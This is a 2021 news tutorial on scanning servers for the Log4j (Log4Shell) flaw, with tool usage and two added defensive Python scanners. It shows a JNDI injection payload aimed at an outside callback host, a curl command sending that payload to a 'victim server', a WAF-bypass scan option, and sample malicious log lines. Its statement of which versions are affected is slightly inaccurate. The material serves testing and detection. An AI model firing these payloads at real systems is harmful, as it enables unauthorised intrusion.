Cloud7 News

How to scan your server for Log4j (Log4Shell) vulnerability

The Apache Log4j vulnerability impacted hundreds of millions of devices. Enterprise IT and security teams are trying to discover whether their systems are affected.


Ugur Kubilay Cam
December 16, 2021

Log4j is a widely used software library for logging security and performance information. Security experts discovered a zero-day vulnerability in the popular library, affecting many enterprise IT systems. Several vendors have released different tools, but a second vulnerability was discovered a short time later, and the Apache Software Foundation pushed out a new fix after that. If your system has any Java application using a version of Log4j before 2.14.1, you should act very quickly. The following tools let you quickly check your systems for the Log4j vulnerability.

Tip: You can follow the updated list and solutions of the applications or systems affected by the Log4j vulnerability here. (The list is constantly updated)
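The tools listed below probe a server from the outside. To check the host itself, the following added example (not from the original article or from any of the listed tools) walks a directory tree and reports every log4j-core copy, including ones nested inside WAR or fat JAR files, that still contains JndiLookup.class, together with the version recorded in its pom.properties. The `build_sample` helper produces constructed test data, not a real Log4j JAR.

```python
import io
import re
import zipfile
from pathlib import Path

# Class whose presence marks a log4j-core build that can perform JNDI lookups.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVES = (".jar", ".war", ".ear")

def inspect_archive(data, label, depth=0):
    """Return [{'path', 'version'}] for every log4j-core copy inside one archive."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return []                      # not a real archive, nothing to report
    findings = []
    with zf:
        names = set(zf.namelist())
        if JNDI_CLASS in names:
            version = "unknown"        # shaded JARs often drop pom.properties
            if POM_PROPS in names:
                text = zf.read(POM_PROPS).decode("utf-8", "replace")
                match = re.search(r"^version=(.+)$", text, re.M)
                if match:
                    version = match.group(1).strip()
            findings.append({"path": label, "version": version})
        if depth < 3:                  # fat JARs and WARs embed libraries as nested archives
            for name in sorted(names):
                if name.lower().endswith(ARCHIVES):
                    findings += inspect_archive(zf.read(name), f"{label}!/{name}", depth + 1)
    return findings

def scan_tree(root):
    """Walk a directory and inspect every JAR/WAR/EAR found under it."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVES:
            findings += inspect_archive(path.read_bytes(), str(path))
    return findings

def build_sample(version, with_jndi=True):
    """Constructed stand-in for log4j-core-<version>.jar (no real class bytes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"")
    return buf.getvalue()

if __name__ == "__main__":
    import sys
    for hit in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{hit['path']}: log4j-core {hit['version']} with JndiLookup.class")
```

Run it with the application directory as the only argument; compare each reported version against the Apache advisory for the fixed release.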

Table of Contents

  • Apache Log4j CVE-2021-44228 Scanner
    • Usage
  • CISA Log4j Scanner
    • Usage
  • Huntress Labs log4shell tester
    • Usage
  • Trend Micro Log4j Vulnerability Tester
    • Usage

Apache Log4j CVE-2021-44228 Scanner

Scanning your system to check for the Apache Log4j vulnerability is very easy. All you have to do is run the open-source tool Apache Log4j CVE-2021-44228, developed by Adil Soybali, a security researcher from Seccops Cyber Security Technologies Inc.

Features

  • Scanning according to the URL list you provide.
  • Scanning by finding the subdomains of the provided domain name.
  • Adding the source domain as a prefix to determine from which source the incoming DNS queries are coming.

Requirements

  • httpx
  • curl

Installation

git clone https://github.com/adilsoybali/Log4j-RCE-Scanner.git
cd Log4j-RCE-Scanner
chmod +x log4j-rce-scanner.sh

Usage

./log4j-rce-scanner.sh -h

This will display help for the tool. Here are all the switches it supports.

-h, --help - Display help
-l, --url-list - List of domain/subdomain/ip to be used for scanning.
-d, --domain - The domain name to which all subdomains and itself will be checked.
-b, --burpcollabid - Burp collabrator client id address or interactsh domain address.

Example uses:

./log4j-rce-scanner.sh -l httpxsubdomains.txt -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net
./log4j-rce-scanner.sh -d adilsoybali.com -b yrt45r4sjyoj19617jem5briio3cs.burpcollaborator.net

If the domain is vulnerable, DNS callbacks carrying the vulnerable domain name are sent to the Burp Collaborator or interactsh address you provided.

  • Burp collaborator documentation page
  • Easy way to set up a custom Burp Collaborator instance in a docker environment
  • Interactsh

Official GitHub Repository

  • https://github.com/adilsoybali/Log4j-RCE-Scanner

CISA Log4j Scanner

https://github.com/cisagov/log4j-scanner

This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The information and code in this repository is provided “as is” and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community. This is not intended to be a 100% true positive solution; False negatives may occur.

Usage

Scan a Single URL

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local

Scan a Single URL using all Request Methods: GET, POST (url-encoded form), POST (JSON body)

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --run-all-tests

Discover WAF bypasses on the environment.

$ python3 log4j-scan.py -u https://log4j.lab.secbot.local --waf-bypass

Scan a list of URLs

$ python3 log4j-scan.py -l urls.txt

Huntress Labs log4shell tester

https://log4shell.huntress.com

This tester provides a payload with a unique identifier, accepts LDAP connections from vulnerable apps, and displays the IP addresses that connect. The sample code (payload) shown below can also be used to test this out.

Usage

Simply copy and paste the generated JNDI syntax (the payload, i.e. the ${jndi[:]ldap[:]//.... code block presented below) into any input: application input boxes, frontend site form fields, logins such as username inputs, or, if you are a bit more technical, even User-Agent, X-Forwarded-For or other customizable HTTP headers.

Sample Code (Payload):

${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url)}

How to send the Log4j payload to the victim server?

  1. You can send the payload to the victim server using a user agent switcher extension on your web browser.
  2. You can also send a curl request to the victim server via the Linux terminal.
     curl http://vulnerable-app:8080 -H 'X-Api-Version: ${jndi:ldap://log4shell.huntress.com:1389/(your_random_huntress_url)}'
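
Because the lookup string travels in request lines and headers, the same syntax can be searched for in a server's own access logs. The following added example (not from the original article or from Huntress) parses Combined Log Format lines, undoes percent-encoding, and reports the source IP and callback host of each `${jndi:` string in the request, Referer or User-Agent field. The log lines are constructed samples; it matches only the literal and percent-encoded forms and sees only fields the server actually logs.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - - [time] "request" status size "referer" "user-agent"
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# Literal lookup syntax as shown in the article: ${jndi:<scheme>://<host>...
JNDI = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/}:\s]+)", re.I)

def decode(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_probes(lines):
    """Return one record per logged field that carries a JNDI lookup string."""
    hits = []
    for line in lines:
        entry = LINE.match(line)
        if not entry:
            continue                    # not in the expected log format
        for field in ("request", "referer", "agent"):
            found = JNDI.search(decode(entry.group(field)))
            if found:
                hits.append({"src": entry.group("ip"), "time": entry.group("time"),
                             "field": field, "scheme": found.group("scheme").lower(),
                             "callback": found.group("host").lower()})
    return hits

# Constructed sample lines (documentation IP ranges, .invalid callback hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://callback.example.invalid:1389/a}"',
    '203.0.113.9 - - [12/Dec/2021:10:02:10 +0000] "GET /search?q=%24%7Bjndi%3Armi'
    '%3A%2F%2Fcb2.example.invalid%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '198.51.100.4 - - [12/Dec/2021:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(hit)
```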


Trend Micro Log4j Vulnerability Tester

log4j-tester.trendmicro.com

Usage

Watch the video below on how to use the Log4J tester.


Tags: Vulnerability
Ugur Kubilay Cam is the content marketing specialist of Cloud7 News. In addition to being an SEO expert, Ugur Kubilay is a Python developer and cybersecurity researcher. Ugur has a Bachelor's degree and a master's degree in Data Analysis. With more than 15 years of experience, Ugur Kubilay Cam is an active Linux user and administrator.
